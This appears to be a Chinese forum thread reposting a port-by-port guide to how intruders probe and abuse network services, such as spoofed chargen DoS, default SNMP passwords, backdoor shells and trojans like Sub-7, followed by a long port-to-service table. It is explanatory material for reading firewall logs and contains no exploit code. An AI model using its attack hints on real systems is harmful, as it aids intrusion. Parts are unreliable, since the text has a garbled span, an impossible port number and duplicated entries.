11 sysstat这是一种UNIX服务,它会列出机器上所有正在运行的进程以及是什么启动了这些进程。这为入侵者提供了许多信息而威胁机器的安全,如暴露已知某些弱点或帐户的程序。这与UNIX系统中“ps”命令的结果相似再说一遍:ICMP没有端口,ICMP port 11通常是ICMPtype=1119 chargen 这是一种仅仅发送字符的服务。UDP版本将会在收到UDP包后回应含有LJ字符的包。TCP连接时,会发送含有LJ字符的数据流知道连接关闭。Hacker利用IP欺骗可以发动DoS攻击伪造两 个chargen服务器之间的UDP由于服务器企图回应两个服务器之间的无限的往返数据通讯一个chargen和echo将导致服务器过载。同样fraggle DoS攻击向目标地址的这个端口广播一个带有伪造受害者IP的数据包,受害者为了回应这些数据而过载。

21 ftp最常见的攻击者用于寻找打开“anonymous”的ftp服务器的方法。这些服务器带有可读写的目录。Hackers或tackers利用这些服务器作为传送warez (私有程序) 和pr0n(故意拼错词而避免被搜索引擎分类)的节点。

22 sshPcAnywhere建立TCP和这一端口的连接可能是为了寻找ssh。这一服务有许多弱点。如果配置成特定的模式,许多使用RSAREF库的版本有不少漏洞。(建议在其它端口运行ssh)还应该注意的是ssh工具包带有一个称为ake-ssh-known-hosts的程序。它会扫描整个域的ssh主机。你有时会被使用这一程序的人无意中扫描到。UDP(而不是TCP)与另一端的5632端口相连意味着存在搜索pcAnywhere的扫描。5632 (十六进制的0x1600)位交换后是0x0016(使进制的22)。

23 Telnet入侵者在搜索远程登陆UNIX的服务。大多数情况下入侵者扫描这一端口是为了找到机器运行的操作系统。此外使用其它技术,入侵者会找到密码。

25 smtp攻击者(spammer)寻找SMTP服务器是为了传递他们的spam。入侵者的帐户总被关闭,他们需要拨号连接到高带宽的e-mail服务器上,将简单的信息传递到不同的地址。SMTP服务器(尤其是sendmail)是进入系统的最常用方法之一,因为它们必须完整的暴露于Internet且邮件的路由是复杂的(暴露+复杂=弱点)。

53 DNSHacker或crackers可能是试图进行区域传递(TCP),欺骗DNS(UDP)或隐藏其它通讯。因此防火墙常常过滤或记录53端口。 需要注意的是你常会看到53端口做为UDP源端口。不稳定的防火墙通常允许这种通讯并假设这是对DNS查询的回复。Hacker常使用这种方法穿透防火墙。

67和68 Bootp和DHCPUDP上的Bootp/DHCP:通过DSL和cable-modem的防火墙常会看见大量发送到广播地址255.255.255.255的数据。这些机器在向DHCP服务器请求一个地址分配。Hacker常进入它们分配一个地址把自己作为局部路由器而发起大量的“中间人”(man-in-middle)攻击。客户端向68端口(bootps)广播请求配置,服务器向67端口(bootpc)广播回应请求。这种回应使用广播是因为客户端还不知道可以发送的IP地址。69 TFTP(UDP) 许多服务器与bootp一起提供这项服务,便于从系统下载启动代码。但是它们常常错误配置而从系统提供任何文件,如密码文件。它们也可用于向系统写入文件

79 finger Hacker用于获得用户信息,查询操作系统,探测已知的缓冲区溢出错误,回应从自己机器到其它机器finger扫描。

98 linuxconf 这个程序提供linuxboxen的简单管理。通过整合的HTTP服务器在98端口提供基于Web界面的服务。它已发现有许多安全问题。一些版本setuidroot,信任局域网,在/tmp下建立Internet可访问的文件,LANG环境变量有缓冲区溢出。 此外因为它包含整合的服务器,许多典型的HTTP漏洞可能存在(缓冲区溢出,历遍目录等)109 POP2并不象POP3那样有名,但许多服务器同时提供两种服务(向后兼容)。在同一个服务器上POP3的漏洞在POP2中同样存在。





110 POP3用于客户端访问服务器端的邮件服务。POP3服务有许多公认的弱点。关于用户名和密码交换缓冲区溢出的弱点至少有20个(这意味着Hacker可以在真正登陆前进入系统)。成功登陆后还有其它缓冲区溢出错误。

111 sunrpc portmap rpcbind Sun RPCPortMapper/RPCBIND。访问portmapper是扫描系统查看允许哪些RPC服务的最早的一步。常 见RPC服务有:pc.mountd, NFS, rpc.statd, rpc.csmd, rpc.ttybd, amd等。入侵者发现了允许的RPC服务将转向提供 服务的特定端口测试漏洞。记住一定要记录线路中的daemon, IDS, 或sniffer,你可以发现入侵者正使用什么程序访问以便发现到底发生了什么。

113 Ident auth .这是一个许多机器上运行的协议,用于鉴别TCP连接的用户。使用标准的这种服务可以获得许多机器的信息(会被Hacker利用)。但是它可作为许多服务的记录器,尤其是FTP, POP, IMAP, SMTP和IRC等服务。通常如果有许多客户通过防火墙访问这些服务,你将会看到许多这个端口的连接请求。记住,如果你阻断这个端口客户端会感觉到在防火墙另一边与e-mail服务器的缓慢连接。许多防火墙支持在TCP连接的阻断过程中发回T,着将回停止这一缓慢的连接。

119 NNTP news新闻组传输协议,承载USENET通讯。当你链接到诸如:news:p.security.firewalls/. 的地址时通常使用这个端口。这个端口的连接企图通常是人们在寻找USENET服务器。多数ISP限制只有他们的客户才能访问他们的新闻组服务器。打开新闻组服务器将允许发/读任何人的帖子,访问被限制的新闻组服务器,匿名发帖或发送spam。

135 oc-serv MS RPC end-point mapper Microsoft在这个端口运行DCE RPC end- point mapper为它的DCOM服务。这与UNIX 111端口的功能很相似。使用DCOM和/或RPC的服务利用 机器上的end-point mapper注册它们的位置。远端客户连接到机器时,它们查询end-point mapper找到服务的位置。同样Hacker扫描机器的这个端口是为了找到诸如:这个机器上运 行Exchange Server吗?是什么版本? 这个端口除了被用来查询服务(如使用epdump)还可以被用于直接攻击。有一些DoS攻 击直接针对这个端口。

137 NetBIOS name service nbtstat (UDP)这是防火墙管理员最常见的信息,请仔细阅读文章后面的NetBIOS一节 139 NetBIOS File and Print Sharing 通过这个端口进入的连接试图获得NetBIOS/SMB服务。这个协议被用于Windows“文件和打印机共享”和SAMBA。在Internet上共享自己的硬盘是可能是最常见的问题。 大量针对这一端口始于1999,后来逐渐变少。2000年又有回升。一些vbs(IE5 VisualBasicscripting)开始将它们自己拷贝到这个端口,试图在这个端口繁殖。

143 IMAP和上面POP3的安全问题一样,许多IMAP服务器有缓冲区溢出漏洞运行登陆过程中进入。记住:一种Linux蠕虫(admw0rm)会通过这个端口繁殖,因此许多这个端口的扫描来自不知情的已被感染的用户。当RadHat在他们的Linux发布版本中默认允许IMAP后,这些漏洞变得流行起来。Morris蠕虫以后这还是第一次广泛传播的蠕虫。这一端口还被用于IMAP2,但并不流行。 已有一些报道发现有些0到143端口的攻击源于脚本。

161 SNMP(UDP)入侵者常探测的端口。SNMP允许远程管理设备。所有配置和运行信息都储存在数据库中,通过SNMP客获得这些信息。许多管理员错误配置将它们暴露于Internet。Crackers将试图使用缺省的密码“public”“private”访问系统。他们可能会试验所有可能的组合。 SNMP包可能会被错误的指向你的网络。Windows机器常会因为错误配置将HP JetDirect rmote management软件使用SNMP。HP OBJECT IDENTIFIER将收到SNMP包。新版的Win98使用SNMP解析域名,你会看见这种包在子网内广播(cable modem, DSL)查询sysName和其它信息。

162 SNMP trap 可能是由于错误配置

177 xdmcp 许多Hacker通过它访问X-Windows控制台,它同时需要打开6000端口。

513 rwho 可能是从使用cable modem或DSL登陆到的子网中的UNIX机器发出的广播。这些人为Hacker进入他们的系统提供 了很有趣的信息

553 CORBA IIOP (UDP) 如果你使用cable modem或DSL VLAN,你将会看到这个端口的广播。CORBA是一种面向对象的RPC(remote procedure call)系统。Hacker会利用这些信息进入系统。 600 Pcserver backdoor 请查看1524端口一些玩script的孩子认为他们通过修改ingreslock和pcserver文件已经完全攻破了系统-- Alan J. Rosenthal.
端口全解析(下)

635 mountd Linux的mountd Bug。这是人们扫描的一个流行的Bug。大多数对这个端口的扫描是基于UDP的,但基于TCP 的mountd有所增加(mountd同时运行于两个端口)。记住,mountd可运行于任何端口(到底在哪个端口,需要在端口111做portmap查询),只是Linux默认为635端口,就象NFS通常运行于2049端口1024 许多人问这个端口是干什么的。它是动态端口的开始。许多程序并不在乎用哪个端口连接网络,它们请求操作系统为它们分配“下一个闲置端口”。基于这一点分配从端口1024开始。这意味着第一个向系统请求分配动态端口的程序将被分配端口1024。为了验证这一点,你可以重启机器,打开Telnet,再打开一个窗口运行“natstat -a”,你将会看到Telnet被分配1024端口。请求的程序越多,动态端口也越多。操作系统分配的端口将逐渐变大。再来一遍,当你浏览Web页时用“netstat”查看,每个Web页需要一个新端口。

1025 参见1024

1026 参见1024

1080 SOCKS 这一协议以管道方式穿过防火墙,允许防火墙后面的许多人通过一个IP地址访问Internet。理论上它应该只允许内部的通信向外达到Internet。但是由于错误的配置,它会允许Hacker/Cracker的位于防火墙外部的攻击穿过防火墙。或者简单地回应位于Internet上的计算机,从而掩饰他们对你的直接攻击。 WinGate是一种常见的Windows个人防火墙,常会发生上述的错误配置。在加入IRC聊天室时常会看到这种情况。

1114 SQL 系统本身很少扫描这个端口,但常常是sscan脚本的一部分。

1243 Sub-7木马(TCP)参见Subseven部分。

1524 ingreslock后门 许多攻击脚本将安装一个后门Sh*ll 于这个端口(尤其是那些针对Sun系统中Sendmail和RPC服务漏洞的脚本,如statd,ttdbserver和cmsd)。如果你刚刚安装了你的防火墙就看到在这个端口上的连接企图,很可能是上述原因。你可以试试Telnet到你的机器上的这个端口,看看它是否会给你一个Sh*ll 。连接到600/pcserver也存在这个问题。

2049 NFS NFS程序常运行于这个端口。通常需要访问portmapper查询这个服务运行于哪个端口,但是大部分情况是安装后NFS杏谡飧龆丝冢?acker/Cracker因而可以闭开portmapper直接测试这个端口。

3128 squid 这是Squid HTTP代理服务器的默认端口。攻击者扫描这个端口是为了搜寻一个代理服务器而匿名访问Internet。你也会看到搜索其它代理服务器的端口: 000/8001/8080/8888。扫描这一端口的另一原因是:用户正在进入聊天室。其它用户(或服务器本身)也会检验这个端口以确定用户的机器是否支持代理。请查看5.3节。

5632 pcAnywere你会看到很多这个端口的扫描,这依赖于你所在的位置。当用户打开pcAnywere时,它会自动扫描局域网C类网以寻找可能得代理(译者:指agent而不是proxy)。Hacker/cracker也会寻找开放这种服务的机器,所以应该查看这种扫描的源地址。一些搜寻pcAnywere的扫描常包含端口22的UDP数据包。参见拨号扫描。

6776 Sub-7 artifact 这个端口是从Sub-7主端口分离出来的用于传送数据的端口。例如当控制者通过电话线控制另一台机器,而被控机器挂断时你将会看到这种情况。因此当另一人以此IP拨入时,他们将会看到持续的,在这个端口的连接企图。(译者:即看到防火墙报告这一端口的连接企图时,并不表示你已被Sub-7控制。)6970 RealAudio RealAudio客户将从服务器的6970-7170的UDP端口接收音频数据流。这是由TCP7070端口外向控制连接设置13223 PowWow PowWow 是Tribal Voice的聊天程序。它允许用户在此端口打开私人聊天的接。这一程序对于建立连接非常具有“进攻性”。它会“驻扎”在这一TCP端口等待回应。这造成类似心跳间隔的连接企图。如果你是一个拨号用户,从另一个聊天者手中“继承”了IP地址这种情况就会发生:好象很多不同的人在测试这一端口。这一协议使用“OPNG”作为其连接企图的前四个字节。

17027 Conducent这是一个外向连接。这是由于公司内部有人安装了带有Conducent "adbot" 的共享软件。Conducent "adbot"是为共享软件显示广告服务的。使用这种服务的一种流行的软件是Pkware。有人试验:阻断这一外向连接不会有任何问题,但是封掉IP地址本身将会导致adbots持续在每秒内试图连接多次而导致连接过载: 机器会不断试图解析DNS名─ads.conducent.com,即IP地址216.33.210.40 ; 216.33.199.77 ;216.33.199.80 ;216.33.199.81;216.33.210.41。(译者:不知NetAnts使用的Radiate是否也有这种现象)

27374 Sub-7木马(TCP) 参见Subseven部分。

30100 NetSphere木马(TCP) 通常这一端口的扫描是为了寻找中了NetSphere木马。

31337 Back Orifice “eliteHacker中31337读做“elite”/ei’li:t/(译者:法语,译为中坚力量,精华。即 3=E, 1=L, 7=T)。因此许多后门程序运行于这一端口。其中最有名的是Back Orifice。曾经一段时间内这是Internet上最常见的扫描。现在它的流行越来越少,其它的 木马程序越来越流行。

31789 Hack-a-tack 这一端口的UDP通讯通常是由于"Hack-a-tack"远程访问木马(RAT,Remote Access Trojan)。这种木马包含内置的31790端口扫描器,因此任何31789端口到317890端口的连 接意味着已经有这种入侵。(31789端口是控制连接,317890端口是文件传输连接)

32770~32900 RPC服务 Sun Solaris的RPC服务在这一范围内。详细的说:早期版本的Solaris(2.5.1之前)将 portmapper置于这一范围内,即使低端口被防火墙封闭仍然允许Hacker/cracker访问这一端口。 扫描这一范围内的端口不是为了寻找portmapper,就是为了寻找可被攻击的已知的RPC服务。

33434~33600 traceroute 如果你看到这一端口范围内的UDP数据包(且只在此范围之内)则可能是由于traceroute。参见traceroute分。

41508 Inoculan早期版本的Inoculan会在子网内产生大量的UDP通讯用于识别彼此。参见 http://www.circlemud.org/~jelson/software/udpsend.html http://www.ccd.bnl.gov/nss/tips/inoculan/index.html
端口1~1024是保留端口,所以它们几乎不会是源端口。但有一些例外,例如来自NAT机器的连接。 常看见紧接着1024的端口,它们是系统分配给那些并不在乎使用哪个端口连接的应用程序的“动态端口”。 Server Client 服务描述

1-5/tcp 动态 FTP 1-5端口意味着sscan脚本

20/tcp 动态 FTP FTP服务器传送文件的端口

53 动态 FTP DNS从这个端口发送UDP回应。你也可能看见源/目标端口的TCP连接。

123 动态 S/NTP 简单网络时间协议(S/NTP)服务器运行的端口。它们也会发送到这个端口的广播。

27910~27961/udp 动态 Quake Quake或Quake引擎驱动的游戏在这一端口运行其服务器。因此来自这一端口范围的UDP包或发送至这一端口范围的UDP包通常是游戏。

61000以上 动态 FTP 61000以上的端口可能来自Linux NAT服务器(IP asquerade)

B14层 发表时间: 10-07-16 18:27

回复: xiaosi2007 [xiaosi2007]   论坛用户   登录
端口详细说明表

1 tcpmux TCPPortServiceMultiplexer 传输控制协议端口服务多路开关选择器
2 compressnet ManagementUtility  compressnet管理实用程序
3 compressnet CompressionProcess  压缩进程
5 rje RemoteJobEntry    远程作业登录
7 echo Echo      回显
9 discard Discard    丢弃
11 systat ActiveUsers    在线用户
13 daytime Daytime     时间
17 qotd QuoteoftheDay   每日引用
18 msp MessageSendProtocol   消息发送协议
19 chargen CharacterGenerator  字符发生器
20 ftp-data FileTransfer[DefaultData] 文件传输协议(默认数据口) 
21 ftp FileTransfer[Control]   文件传输协议(控制)
22 ssh SSHRemoteLoginProtocol  SSH远程登录协议
23 telnet Telnet    终端仿真协议
24 anyprivatemailsystem   预留给个人用邮件系统
25 smtp SimpleMailTransfer   简单邮件发送协议
27 nsw-fe NSWUserSystemFE   NSW用户系统现场工程师
29 msg-icp MSGICP     MSG ICP
31 msg-auth MSGAuthentication  MSG验证
33 dsp DisplaySupportProtocol  显示支持协议
35 anyprivateprinterserver  预留给个人打印机服务
37 time Time      时间
38 rap RouteAccessProtocol   路由访问协议
39 rlp ResourceLocationProtocol  资源定位协议
41 graphics Graphics    图形
42 nameserver WINSHostNameServer  WINS主机名服务
43 nicname WhoIs    "绰号"whois服务
44 mpm-flags MPMFLAGSProtocol  MPM(消息处理模块)标志协议
45 mpm MessageProcessingModule[recv] 消息处理模块 
46 mpm-snd MPM[defaultsend]   消息处理模块(默认发送口)
47 ni-ftp NIFTP    NIFTP
48 auditd DigitalAuditDaemon  数码音频后台服务49 tacacs LoginHostProtocol(TACACS) TACACS登录主机协议50 re-mail-ckRemoteMailCheckingProtocol 远程邮件检查协议[未结束]
51 la-maint IMPLogicalAddressMaintenance IMP(接口信息处理机)逻辑地址维护
52 xns-time XNSTimeProtocol   施乐网络服务系统时间协议
53 domain DomainNameServer   域名服务器
54 xns-ch XNSClearinghouse    施乐网络服务系统票据交换55 isi-gl ISIGraphicsLanguage  ISI图形语言
56 xns-auth XNSAuthentication  施乐网络服务系统验证
57 ? anyprivateterminalaccess  预留个人用终端访问
58 xns-mail XNSMail    施乐网络服务系统邮件
59 anyprivatefileservice   预留个人文件服务
60 Unassigned     未定义
61 ni-mail NIMAIL     NI邮件?
62 acas ACAServices    异步通讯适配器服务
63 whois+whois+     WHOIS+
64 covia CommunicationsIntegrator(CI) 通讯接口 
65 tacacs-ds TACACS-DatabaseService  TACACS数据库服务
66 sql*net OracleSQL*NET   OracleSQL*NET
67 bootps BootstrapProtocolServer  引导程序协议服务端
68 bootpc BootstrapProtocolClient  引导程序协议客户端
69 tftp TrivialFileTransfer   小型文件传输协议
70 gopher Gopher    信息检索协议
71 netrjs-1 RemoteJobService  远程作业服务
72 netrjs-2 RemoteJobService  远程作业服务
73 netrjs-3 RemoteJobService  远程作业服务
74 netrjs-4 RemoteJobService  远程作业服务
75 anyprivatedialoutservice  预留给个人拨出服务
76deos DistributedExternalObjectStore分布式外部对象存储 
77 anyprivateRJEservice   预留给个人远程作业输入服务
78 vettcp vettcp    修正TCP?
79 finger Finger    查询远程主机在线用户等信息
80 http WorldWideWebHTTP    全球信息网超文本传输协议81 hosts2-ns HOSTS2NameServer  HOST2名称服务
82 xfer XFERUtility    传输实用程序
83 mit-ml-dev MITMLDevice    模块化智能终端ML设备
84 ctf CommonTraceFacility   公用追踪设备
85 mit-ml-dev MITMLDevice    模块化智能终端ML设备
86 mfcobol MicroFocusCobol   MicroFocusCobol编程语言
87 anyprivateterminallink  预留给个人终端连接
88 kerberos Kerberos    Kerberros安全认证系统
89 su-mit-tg SU/MITTelnetGateway  SU/MIT终端仿真网关
90 dnsix DNSIXSecuritAttributeTokenMap DNSIX安全属性标记图91 mit-dov MITDoverSpooler   MITDover假脱机
92 npp NetworkPrintingProtocol  网络打印协议
93 dcp DeviceControlProtocol  设备控制协议
94 objcall TivoliObjectDispatcher  Tivoli对象调度
95 supdup SUPDUP    
96 dixie DIXIEProtocolSpecification  DIXIE协议规范
97ft-rvfftRemoteVirturalFileProtocol)快速远程虚拟文件协议98 tacnews TACNews     TAC新闻协议
99 metagram MetagramRelay    
100 newacct [unauthorizeduse]
101=NICHostNameServer
102=ISO-TSAP
103=GenesisPoint-to-PointTransNet
104=ACR-NEMADigitalImag.&Comm.300
105=MailboxNameNameserver
106=3COM-TSMUX3com-tsmux
107=RemoteTelnetService
108=SNAGatewayAccessServer
109=PostOfficeProtocol-Version2
110=PostOfficeProtocol-Version3
111=SUNRPC
112=McIDASDataTransmissionProtocol
113=AuthenticationService
114=AudioNewsMulticast
115=SimpleFileTransferProtocol
116=ANSAREXNotify
117=UUCPPathService
118=SQLServicessqlserv
119=NetworkNewsTransferProtocol
120=CFDPTKTcfdptkt
121=EncoreExpeditedRemotePro.Call
122=SMAKYNETsmakynet
123=NetworkTimeProtocol
124=ANSAREXTrader
125=LocusPC-InterfaceNetMapSer
126=UnisysUnitaryLogin
127=LocusPC-InterfaceConnServer
128=GSSXLicenseVerification
129=PasswordGeneratorProtocol
130=ciscoFNATIVE
131=ciscoTNATIVE
132=ciscoSYSMAINT
133=StatisticsService
134=INGRES-NETService
135=LocationService
136=PROFILENamingSystem
137=NETBIOSNameService
138=NETBIOSDatagramService
139=NETBIOSSessionService
140=EMFISDataService
141=EMFISControlService
142=Britton-LeeIDM
143=InterimMailAccessProtocolv2
144=NewSnews
145=UAACProtocoluaac
146=ISO-IP0iso-tp0
147=ISO-IPiso-ip
148=CRONUS-SUPPORT
149=AED512EmulationService
150=SQL-NETsql-net
151=HEMShems
152=BackgroundFileTransferProgram
153=SGMPsgmp
154=NETSCnetsc-prod
155=NETSCnetsc-dev
156=SQLService
157=KNET/VMCommand/MessageProtocol
158=PCMailServerpcmail-srv
159=NSS-Routingnss-routing
160=SGMP-TRAPSsgmp-traps
161=SNMP
162=SNMPTRAP
163=CMIP/TCPManager
164=CMIP/TCPAgent
165=Xeroxxns-courier
166=SiriusSystems
167=NAMPnamp
168=RSVDrsvd
169=Send
170=NetworkPostscript
170=NetworkPostscript
171=NetworkInnovationsMultiplex
172=NetworkInnovationsCL/1
173=Xyplexxyplex-mux
174=MAILQ
175=VMNET
176=GENRAD-MUXgenrad-mux
177=XDisplayManagerControlProtocol
178=NextStepWindowServer
179=BorderGatewayProtocol
180=Intergraphris
181=Unifyunify
182=UnisysAuditSITP
183=OCBinderocbinder
184=OCServerocserver
185=Remote-KIS
186=KISProtocolkis
187=ApplicationCommunicationInterface
188=PlusFive’sMUMPS
189=QueuedFileTransport
189=QueuedFileTransport
190=GatewayAccessControlProtocol
190=GatewayAccessControlProtocol
191=ProsperoDirectoryService
191=ProsperoDirectoryService
192=OSUNetworkMonitoringSystem
193=srmp,SpiderRemoteMonitoringProtocol
194=irc,InternetRelayChatProtocl
195=DNSIXNetworkLevelModuleAudit
196=DNSIXSessionMgtModuleAuditRedir
197=DirectoryLocationService
198=DirectoryLocationServiceMonitor
199=SMUX
200=IBMSystemResourceController
201=at-rtmpAppleTalkRoutingMaintenance
202=at-nbpAppleTalkNameBinding
203=at-3AppleTalkUnused
204=AppleTalkEcho
205=AppleTalkUnused
206=AppleTalkZoneInformation
207=AppleTalkUnused
208=AppleTalkUnused
209=TrivialAuthenticatedMailProtocol
210=ANSIZ39.50z39.50
211=TexasInstruments914C/GTerminal
212=ATEXSSTRanet
213=IPX
214=VMPWSCSvmpwscs
215=InsigniaSolutions
216=AccessTechnologyLicenseServer
217=dBASEUnix
218=NetixMessagePostingProtocol
219=UnisysARPsuarps
220=InteractiveMailAccessProtocolv3
221=BerkeleyrlogindwithSPXauth
222=BerkeleyrshdwithSPXauth
223=CertificateDistributionCenter
224=Reserved(224-241)
241=Reserved(224-241)
242=Unassigned#
243=SurveyMeasurement
244=Unassigned#
245=LINKlink
246=DisplaySystemsProtocol
247-255Reserved
256-343Unassigned
344=ProsperoDataAccessProtocol
345=PerfAnalysisWorkbench
346=Zebraserverzserv
347=FatmenServerfatserv
348=CabletronManagementProtocol
349-370Unassigned
371=Clearcaseclearcase
372=UnixListservulistserv
373=LegentCorporation
374=LegentCorporation
375=Hasslehassle
376=AmigaEnvoyNetworkInquiryProto
377=NECCorporation
378=NECCorporation
379=TIA/EIA/IS-99modemclient
380=TIA/EIA/IS-99modemserver
381=hpperformancedatacollector
382=hpperformancedatamanagednode
383=hpperformancedataalarmmanager
384=ARemoteNetworkServerSystem
385=IBMApplication
386=ASAMessageRouterObjectDef.
387=AppletalkUpdate-BasedRoutingPro.
388=UnidataLDMVersion4
389=LightweightDirectoryAccessProtocol
390=UISuis
391=SynOpticsSNMPRelayPort
392=SynOpticsPortBrokerPort
393=DataInterpretationSystem
394=EMBLNucleicDataTransfer
395=NETscoutControlProtocol
396=NovellNetwareoverIP
397=MultiProtocolTrans.Net.
398=Kryptolankryptolan
399=Unassigned#
400=WorkstationSolutions
401=UninterruptiblePowerSupply
402=GenieProtocol
403=decapdecap
404=ncednced
405=ncldncld
406=InteractiveMailSupportProtocol
407=Timbuktutimbuktu
408=ProsperoResourceManagerSys.Man.
409=ProsperoResourceManagerNodeMan.
410=DECLadebugRemoteDebugProtocol
411=RemoteMTProtocol
412=TrapConventionPort
413=SMSPsmsp
414=InfoSeekinfoseek
415=BNetbnet
416=Silverplattersilverplatter
417=Onmuxonmux
418=Hyper-Ghyper-g
419=Arielariel1
420=SMPTEsmpte
421=Arielariel2
422=Arielariel3
423=IBMOperationsPlanningandControlStart
424=IBMOperationsPlanningandControlTrack
425=ICADicad-el
426=smartsdpsmartsdp
427=ServerLocation
429=OCS_AMU
430=UTMPSDutmpsd
431=UTMPCDutmpcd
432=IASDiasd
433=NNSPnnsp
434=MobileIP-Agent
435=MobilIP-MN
436=DNA-CMLdna-cml
437=comscmcomscm
439=dasp,ThomasObermair
440=sgcpsgcp
441=decvms-sysmgtdecvms-sysmgt
442=cvc_hostdcvc_hostd
443=https
444=SimpleNetworkPagingProtocol
445=Microsoft-DS
446=DDM-RDBddm-rdb
447=DDM-RFMddm-dfm
448=DDM-BYTEddm-byte
449=ASServerMapper
450=TServertserver
512=exec,Remoteprocessexecution
513=login,remotelogin
514=cmd,execwithautoauth.
514=syslog
515=Printerspooler
516=Unassigned
517=talk
519=unixtime
520=extendedfilenameserver
521=Unassigned
522=Unassigned
523=Unassigned
524=Unassigned
526=newdate
530=rpccourier
531=chatconference
532=readnewsnetnews
533=foremergencybroadcasts
539=ApertusTechnologiesLoadDetermination
540=uucp
541=uucp-rlogin
542=Unassigned
543=klogin
544=kshell
545=Unassigned
546=Unassigned
547=Unassigned
548=Unassigned
549=Unassigned
550=new-who
551=Unassigned
552=Unassigned
553=Unassigned
554=Unassigned
555=dsf
556=remotefs
557-559=rmonitor
560=rmonitord
561=dmonitor
562=chcmd
563=Unassigned
564=plan9fileservice
565=whoami
566-569Unassigned
570=demonmeter
571=udemonmeter
572-599Unassignedipcserver
600=SunIPCserver
607=nqs
606=CrayUnifiedResourceManager
608=Sender-Initiated/UnsolicitedFileTransfer
609=npmp-trapnpmp-trap
610=npmp-localnpmp-local
611=npmp-guinpmp-gui
634=ginadginad
666=DoomIdSoftware
704=errlogcopy/serverdaemon
709=EntrustManager
729=IBMNetViewDM/6000Server/Client
730=IBMNetViewDM/6000send/tcp
731=IBMNetViewDM/6000receive/tcp
741=netGWnetgw
742=NetworkbasedRev.Cont.Sys.
744=FlexibleLicenseManager
747=FujitsuDeviceControl
748=RussellInfoSciCalendarManager
749=kerberosadministration
751=pump
752=qrh
754=send
758=nlogin
759=con
760=ns
762=quotad
763=cycleserv
765=webster
767=phonephonebook
769=vid
771=rtip
772=cycleserv2
774=acmaint_dbd
775=acmaint_transd
780=wpgs
786=Concertconcert
800=mdbs_daemon
996=CentralPointSoftware
997=maitrd
999=puprouter
1023=Reserved
1024=Reserved
1025=networkblackjack
1030=BBNIAD
1031=BBNIAD
1032=BBNIAD
1067=InstallationBootstrapProto.Serv.
1068=InstallationBootstrapProto.Cli.
1080=SOCKS
1083=AnasoftLicenseManager
1084=AnasoftLicenseManager
1155=NetworkFileAccess
1222=SNIR&Dnetwork
1248=hermes
1346=AltaAnalyticsLicenseManager
1347=multimediaconferencing
1347=multimediaconferencing
1348=multimediaconferencing
1349=RegistrationNetworkProtocol
1350=RegistrationNetworkProtocol
1351=DigitalToolWorks(MIT)
1352=/LotusNotelotusnote
1353=ReliefConsulting
1354=RightBrainSoftware
1355=IntuitiveEdge
1356=CuillaMartinCompany
1357=ElectronicPegBoard
1358=CONNLCLIconnlcli
1359=FTSRVftsrv
1360=MIMERmimer
1361=LinX
1362=TimeFliestimeflies
1363=NetworkDataMoverRequester
1364=NetworkDataMoverServer
1365=NetworkSoftwareAssociates
1366=NovellNetWareCommServicePlatform
1367=DCSdcs
1368=ScreenCastscreencast
1369=GlobalViewtoUnixShell
1370=UnixShelltoGlobalView
1371=FujitsuConfigProtocol
1372=FujitsuConfigProtocol
1373=Chromagrafxchromagrafx
1374=EPISoftwareSystems
1375=Bytexbytex
1376=IBMPersontoPersonSoftware
1377=CichlidLicenseManager
1378=ElanLicenseManager
1379=IntegritySolutions
1380=TelesisNetworkLicenseManager
1381=AppleNetworkLicenseManager
1382=udt_os
1383=GWHannawayNetworkLicenseManager
1384=ObjectiveSolutionsLicenseManager
1385=AtexPublishingLicenseManager
1386=CheckSumLicenseManager
1387=ComputerAidedDesignSoftwareIncLM
1388=ObjectiveSolutionsDataBaseCache
1389=documentManager
1390=StorageController
1391=StorageAccessServer
1392=PrintManagericlpv-pm
1393=NetworkLogServer
1394=NetworkLogClient
1395=PCWorkstationManagersoftware
1396=DVLActiveMail
1397=AudioActiveMail
1398=VideoActiveMail
1399=CadkeyLicenseManager
1400=CadkeyTabletDaemon
1401=GoldleafLicenseManager
1402=ProsperoResourceManager
1403=ProsperoResourceManager
1404=InfiniteGraphicsLicenseManager
1405=IBMRemoteExecutionStarter
1406=NetLabsLicenseManager
1407=DBSALicenseManager
1408=SophiaLicenseManager
1409=HereLicenseManager
1410=HiQLicenseManager
1411=AudioFileaf
1412=InnoSysinnosys
1413=Innosys-ACLinnosys-acl
1414=IBMMQSeriesibm-mqseries
1415=DBStardbstar
1416=NovellLU6.2novell-lu6.2
1417=TimbuktuService1Port
1417=TimbuktuService1Port
1418=TimbuktuService2Port
1419=TimbuktuService3Port
1420=TimbuktuService4Port
1421=GandalfLicenseManager
1422=AutodeskLicenseManager
1423=EssbaseArborSoftware
1424=HybridEncryptionProtocol
1425=ZionSoftwareLicenseManager
1426=Satellite-dataAcquisitionSystem1
1427=mloaddmonitoringtool
1428=InformatikLicenseManager
1429=HypercomNMSnms
1430=HypercomTPDUtpdu
1431=ReverseGosipTransport
1432=BlueberrySoftwareLicenseManager
1433=Microsoft-SQL-Server
1434=Microsoft-SQL-Monitor
1435=IBMCISCibm-cics
1436=Satellite-dataAcquisitionSystem2
1437=Tabulatabula
1438=EiconSecurityAgent/Server
1439=EiconX25/SNAGateway
1440=EiconServiceLocationProtocol
1441=CadisLicenseManagement
1442=CadisLicenseManagement
1443=IntegratedEngineeringSoftware
1444=MarcamLicenseManagement
1445=ProximaLicenseManager
1446=OpticalResearchAssociatesLicenseManager
1447=AppliedParallelResearchLM
1448=OpenConnectLicenseManager
1449=PEportpeport
1450=TandemDistributedWorkbenchFacility
1451=IBMInformationManagement
1452=GTEGovernmentSystemsLicenseMan
1453=GenieLicenseManager
1454=interHDLLicenseManager
1454=interHDLLicenseManager
1455=ESLLicenseManager
1456=DCAdca
1457=ValisysLicenseManager
1458=NicholsResearchCorp.
1459=ProshareNotebookApplication
1460=ProshareNotebookApplication
1461=IBMWirelessLAN
1462=WorldLicenseManager
1463=Nucleusnucleus
1464=MSLLicenseManager
1465=PipesPlatform
1466=OceanSoftwareLicenseManager
1467=CSDMBASEcsdmbase
1468=CSDMcsdm
1469=ActiveAnalysisLimitedLicenseManager
1470=UniversalAnalytics
1471=csdmbasecsdmbase
1472=csdmcsdm
1473=OpenMathopenmath
1474=Telefindertelefinder
1475=TaligentLicenseManager
1476=clvm-cfgclvm-cfg
1477=ms-sna-server
1478=ms-sna-base
1479=dberegisterdberegister
1480=PacerForumpacerforum
1481=AIRSairs
1482=MiteksysLicenseManager
1483=AFSLicenseManager
1484=ConfluentLicenseManager
1485=LANSourcelansource
1486=nms_topo_serv
1487=LocalInfoSrvr
1488=DocStordocstor
1489=dmdocbrokerdmdocbroker
1490=insitu-confinsitu-conf
1491=anynetgateway
1492=stone-design-1
